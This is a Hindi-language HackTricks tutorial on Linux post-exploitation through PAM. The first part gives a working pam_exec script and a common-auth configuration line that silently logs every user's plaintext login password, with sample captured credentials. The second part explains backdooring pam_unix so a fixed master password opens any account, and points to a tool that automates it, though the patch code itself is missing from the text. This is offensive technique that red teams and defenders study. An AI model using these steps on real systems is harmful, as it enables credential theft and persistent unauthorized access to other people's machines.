.. | ||
pam-pluggable-authentication-modules.md | ||
README.md |
लिनक्स पोस्ट-एक्सप्लोइटेशन
☁️ हैकट्रिक्स क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥
-
क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को हैकट्रिक्स में विज्ञापित करना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करना चाहिए? सदस्यता योजनाएं की जांच करें!
-
खोजें द पीएएस फैमिली, हमारा विशेष संग्रह एनएफटीएस
-
प्राप्त करें आधिकारिक पीएएस और हैकट्रिक्स स्वैग
-
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या फॉलो करें मुझे ट्विटर 🐦@carlospolopm.
-
अपने हैकिंग ट्रिक्स को हैकट्रिक्स रेपो और हैकट्रिक्स-क्लाउड रेपो में पीआर जमा करके साझा करें।
PAM के साथ लॉगऑन पासवर्ड को स्निफ करें
चलो PAM मॉड्यूल को कॉन्फ़िगर करें ताकि हर उपयोगकर्ता द्वारा उपयोग किए जाने वाले पासवर्ड को लॉग करें। यदि आपको पता नहीं है कि PAM क्या है, तो देखें:
{% content-ref url="pam-pluggable-authentication-modules.md" %} pam-pluggable-authentication-modules.md {% endcontent-ref %}
सबसे पहले, हम एक बैश स्क्रिप्ट बनाते हैं जो हर नई प्रमाणीकरण होने पर आवंटित किया जाएगा।
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
परिवर्तनशीलता चरों केवल PAM विशिष्ट होंगे और pam_exec.so
मॉड्यूल के माध्यम से उपलब्ध होंगे।
यहां चरों का अर्थ है:
- $PAM_USER: उस उपयोगकर्ता का नाम जो दर्ज किया गया था।
- $PAM_RHOST: रिमोट होस्ट (सामान्यतः IP पता)
- $(cat -): यह
stdin
को पढ़ता है, और इसमें स्क्रिप्ट द्वारा पकड़ा गया पासवर्ड होगा - परिणामों को
/var/log/toomanysecrets.log
पर एक लॉग फ़ाइल में पाइप किया जाता है
फ़ाइल को सभी उपयोगकर्ताओं को पढ़ने से रोकने के लिए, इसे पहले से बना लें और chmod
चलाएं, उदा।:
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
अगले, PAM कॉन्फ़िगरेशन फ़ाइल को अपडेट किया जाना चाहिए, pam_exec
मॉड्यूल का उपयोग स्क्रिप्ट को आह्वानित करने के लिए किया जाएगा।
/etc/pam.d/
में कई कॉन्फ़िग फ़ाइलें होती हैं, और हम common-auth
को चुनते हैं।
sudo nano /etc/pam.d/common-auth
फ़ाइल के नीचे, निम्नलिखित प्रमाणीकरण मॉड्यूल जोड़ें:
auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
विकल्पों का निम्नलिखित अर्थ है:
- optional: यदि कोई त्रुटि हो तो प्रमाणीकरण विफल नहीं होना चाहिए (यह एक आवश्यक चरण नहीं है)
- pam_exec.so: यह लिविंग ऑफ द लैंड पैम मॉड्यूल है जो विभिन्न स्क्रिप्ट को आमंत्रित कर सकता है
- expose_authtok: यह ट्रिक है जो
stdin
के माध्यम से पासवर्ड पढ़ने की अनुमति देता है - quiet: उपयोगकर्ता को कोई त्रुटि नहीं दिखाएं (यदि कुछ काम नहीं करता है तो)
- अंतिम तर्क पिछले बनाए गए शैल स्क्रिप्ट है
अंत में, फ़ाइल को क्रियाशील बनाएं:
sudo chmod 700 /usr/local/bin/toomanysecrets.sh
अब, इसे एक दूसरे मशीन से ssh करके या स्थानीय रूप से लॉगिन करके इसे आज़माएं।
और फिर लॉग फ़ाइल पर नज़र डालें:
$ sudo cat /var/log/toomanysecrets.log
Sun Jun 26 23:36:37 PDT 2022 tom, Trustno1!, From: 192.168.1.149
Sun Jun 26 23:37:53 PDT 2022 tom, Trustno1!, From:
Sun Jun 26 23:39:12 PDT 2022 tom, Trustno1!, From: 192.168.1.149
PAM को Backdoor करना
चलो PAM के स्रोत में जाएँ (आपके डिस्ट्रो पर निर्भर करेगा, अपने वर्जन नंबर को लें...) और pam_unix_auth.c फ़ाइल में लाइन नंबर 170/180 के आसपास देखें:
vi modules/pam_unix/pam_unix_auth.c
इसे निम्नलिखित से बदलें:
इससे किसी भी उपयोगकर्ता को "0xMitsurugi" पासवर्ड का उपयोग करके लॉग इन करने की अनुमति होगी।
pam_unix_auth.c
को पुनः कंपाइल करें और pam_unix.so फ़ाइल को बदलें:
make
sudo cp \
/home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/pam_unix.so \
/lib/x86_64-linux-gnu/security/
{% hint style="info" %} आप इस प्रक्रिया को https://github.com/zephrax/linux-pam-backdoor के साथ स्वचालित कर सकते हैं। {% endhint %}
संदर्भ
- https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/
- https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आप PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं? सदस्यता योजनाएं की जांच करें!
-
खोजें The PEASS Family, हमारा विशेष NFT संग्रह
-
प्राप्त करें आधिकारिक PEASS & HackTricks swag
-
शामिल हों 💬 Discord समूह या टेलीग्राम समूह या मुझे ट्विटर पर फ़ॉलो करें 🐦@carlospolopm.
-
अपने हैकिंग ट्रिक्स साझा करें, hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके।